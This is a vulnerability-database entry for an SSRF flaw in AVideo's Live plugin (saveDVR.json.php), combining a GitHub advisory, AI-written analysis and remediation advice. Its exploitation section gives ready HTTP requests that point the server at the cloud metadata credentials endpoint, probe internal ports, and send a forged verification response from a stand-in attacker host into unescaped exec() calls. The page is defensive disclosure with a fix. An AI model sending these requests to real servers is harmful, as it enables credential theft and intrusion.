PHP
CVE-2026-33351
CRITICAL
Severity by source
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
Lifecycle Timeline
2DescriptionGitHub Advisory
Summary
A Server-Side Request Forgery (SSRF) vulnerability exists in plugin/Live/standAloneFiles/saveDVR.json.php. When the AVideo Live plugin is deployed in standalone mode (the intended configuration for this file), the $_REQUEST['webSiteRootURL'] parameter is used directly to construct a URL that is fetched server-side via file_get_contents(). No authentication, origin validation, or URL allowlisting is performed.
Affected Component
File: plugin/Live/standAloneFiles/saveDVR.json.php, lines 5-28
$streamerURL = ""; // change it to your streamer URL
$configFile = '../../../videos/configuration.php';
if (file_exists($configFile)) {
include_once $configFile;
$streamerURL = $global['webSiteRootURL'];
}
if (empty($streamerURL) && !empty($_REQUEST['webSiteRootURL'])) {
$streamerURL = $_REQUEST['webSiteRootURL']; // ATTACKER-CONTROLLED
}
// ...
$verifyURL = "{$streamerURL}plugin/SendRecordedToEncoder/verifyDVRTokenVerification.json.php?saveDVR={$_REQUEST['saveDVR']}";
$result = file_get_contents($verifyURL); // SSRFRoot Cause
- User-controlled URL base: When the configuration file does not exist (standalone deployment),
$streamerURLis set directly from$_REQUEST['webSiteRootURL']with no validation. - No URL allowlisting or scheme restriction: The value is used as-is in a
file_get_contents()call. There is no check forhttp/httpsscheme only, no private IP blocking, and no domain allowlist. - Verification bypass by design: The token verification URL is constructed using the attacker-controlled base URL. The attacker can point it to their own server, which returns a JSON response that passes all validation checks, effectively bypassing authentication.
Exploitation
Part 1: Basic SSRF (Internal Network Access)
POST /plugin/Live/standAloneFiles/saveDVR.json.php
Content-Type: application/x-www-form-urlencoded
webSiteRootURL=http://169.254.169.254/latest/meta-data/iam/security-credentials/&saveDVR=anythingThe server fetches:
http://169.254.169.254/latest/meta-data/iam/security-credentials/plugin/SendRecordedToEncoder/verifyDVRTokenVerification.json.php?saveDVR=anythingWhile the appended path may cause a 404 on the metadata service, the attacker can also use this for:
- Internal port scanning:
webSiteRootURL=http://192.168.1.X:PORT/- differentiate open/closed ports by response time and error messages. - Internal service access:
webSiteRootURL=http://internal-service/- reach services behind the firewall. - Cloud metadata access: With URL path manipulation or by hosting a redirect on the attacker server.
Part 2: Verification Bypass + Downstream Command Execution Chain
This is the more severe attack chain:
- The attacker sets up a server at
https://attacker.example.com/with the path:
/plugin/SendRecordedToEncoder/verifyDVRTokenVerification.json.phpThat returns:
{"error": false, "response": {"key": "attacker_controlled_value"}}- The attacker sends:
POST /plugin/Live/standAloneFiles/saveDVR.json.php
webSiteRootURL=https://attacker.example.com/&saveDVR=anything- The server fetches the verification URL from the attacker's server, receives the forged valid response, and proceeds to process it.
- The
keyvalue from the response flows into shell commands:
- Line 55:
$DVRFile = "{$hls_path}{$key}";- used inexec()at line 80 (thoughescapeshellarg()is applied to the path components) - Line 72:
$DVRFileTarget = "{$tmpDVRDir}" . DIRECTORY_SEPARATOR . "{$key}.m3u8";- used withoutescapeshellarg()in: - Line 119:
exec("echo \"{$endLine}\" >> {$DVRFileTarget}"); - Line 157:
exec("ffmpeg -i {$DVRFileTarget} -c copy -bsf:a aac_adtstoasc {$filename} -y"); - Line 167:
exec("rm -R {$tmpDVRDir}");
The $key is sanitized at line 47 with preg_replace("/[^0-9a-z_:-]/i", "", $key), which limits characters to alphanumerics, underscores, colons, and hyphens. This blocks most command injection payloads. However:
- The SSRF itself (Part 1) is independently exploitable regardless of the downstream chain.
- The verification bypass grants the attacker control over the processing flow even if direct OS command injection is constrained by the regex.
- The colon character (
:) is allowed by the regex and has special meaning in some shell contexts and FFmpeg input specifiers.
Impact
- SSRF: The server can be used as a proxy to scan and access internal network resources, cloud metadata endpoints, and other services not intended to be publicly accessible.
- Authentication Bypass: The DVR token verification is completely bypassed by redirecting the check to an attacker-controlled server.
- Potential Command Execution: While the regex on
$keylimits direct shell injection, the attacker gains control over file paths and FFmpeg input specifiers, which could be leveraged for further exploitation depending on the environment. - Information Disclosure: Error messages at lines 31-32 reflect the fetched URL and its content, potentially leaking information about internal infrastructure.
Suggested Fix
- Remove the user-controlled
webSiteRootURLfallback entirely. Require$streamerURLto be configured in the file or via the configuration file. If a fallback is necessary, validate it against a strict allowlist:
// Remove this block:
// if (empty($streamerURL) && !empty($_REQUEST['webSiteRootURL'])) {
// $streamerURL = $_REQUEST['webSiteRootURL'];
// }
// If $streamerURL is still empty, abort:
if (empty($streamerURL)) {
error_log("saveDVR: streamerURL is not configured");
die('saveDVR: Server not configured');
}- If the parameter must remain for backward compatibility, validate it:
if (empty($streamerURL) && !empty($_REQUEST['webSiteRootURL'])) {
$url = filter_var($_REQUEST['webSiteRootURL'], FILTER_VALIDATE_URL);
if ($url && preg_match('/^https?:\/\//i', $url)) {
// Resolve hostname and block private/reserved IPs
$host = parse_url($url, PHP_URL_HOST);
$ip = gethostbyname($host);
if (!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {
die('saveDVR: Invalid URL');
}
$streamerURL = $url;
}
}- Apply
escapeshellarg()to all variables used inexec()calls, including$DVRFileTargetat lines 119, 157, and$tmpDVRDirat line 167.
AnalysisAI
A Server-Side Request Forgery (SSRF) vulnerability in AVideo's Live plugin allows unauthenticated remote attackers to scan internal networks, access cloud metadata services, and bypass authentication mechanisms when the plugin is deployed in standalone mode. The vulnerability exists because user-controlled input is directly used to construct URLs for server-side requests without validation, enabling attackers to proxy requests through the vulnerable server and potentially chain this with command execution. With a CVSS score of 9.1 and requiring no authentication or user interaction, this represents a critical security risk for affected deployments.
Technical ContextAI
The vulnerability affects AVideo (CPE: pkg:composer/wwbn_avideo) specifically in the Live plugin's standalone deployment mode through the saveDVR.json.php file. This is a classic CWE-918 (Server-Side Request Forgery) where the $_REQUEST['webSiteRootURL'] parameter is passed directly to PHP's file_get_contents() function without any validation, allowing attackers to control the destination of server-initiated HTTP requests. The vulnerability is compounded by the fact that the verification mechanism itself uses this attacker-controlled URL, enabling complete bypass of the DVR token authentication by redirecting verification requests to attacker-controlled servers that return forged valid responses.
RemediationAI
The primary remediation is to apply the vendor patch that removes the user-controlled webSiteRootURL fallback mechanism entirely, requiring proper configuration of the streamerURL parameter. Until patching is possible, disable the Live plugin's standalone mode or implement strict network-level controls to prevent access to the vulnerable saveDVR.json.php endpoint. If the parameter must remain for backward compatibility, implement URL validation including scheme restrictions (HTTP/HTTPS only), hostname resolution with private IP blocking, and proper escaping of all variables used in shell commands. Refer to the vendor security advisory at https://github.com/WWBN/AVideo/security/advisories/GHSA-5f7v-4f6g-74rj for specific patch information.
sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not
(1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in Netgear
ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Rated critical severity (C
Roundcube Webmail contains a critical PHP object deserialization vulnerability (CVE-2025-49113, CVSS 9.9) that allows au
Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP c
Palo Alto Networks PAN-OS management web interface contains an authentication bypass allowing unauthenticated attackers
Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re
Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re
The get_referers function in /opt/ws/bin/sblistpack in Sophos Web Appliance before 3.7.9.1 and 3.8 before 3.8.1.1 allows
The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1
NetAlertX (formerly PiAlert) versions 23.01.14 through 24.x before 24.10.12 allow unauthenticated command injection thro
The GiveWP - Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all
Same weakness CWE-918 – Server-Side Request Forgery (SSRF)
View allSame technique Authentication Bypass
View allShare
External POC / Exploit Code
Leaving vuln.today
GHSA-5f7v-4f6g-74rj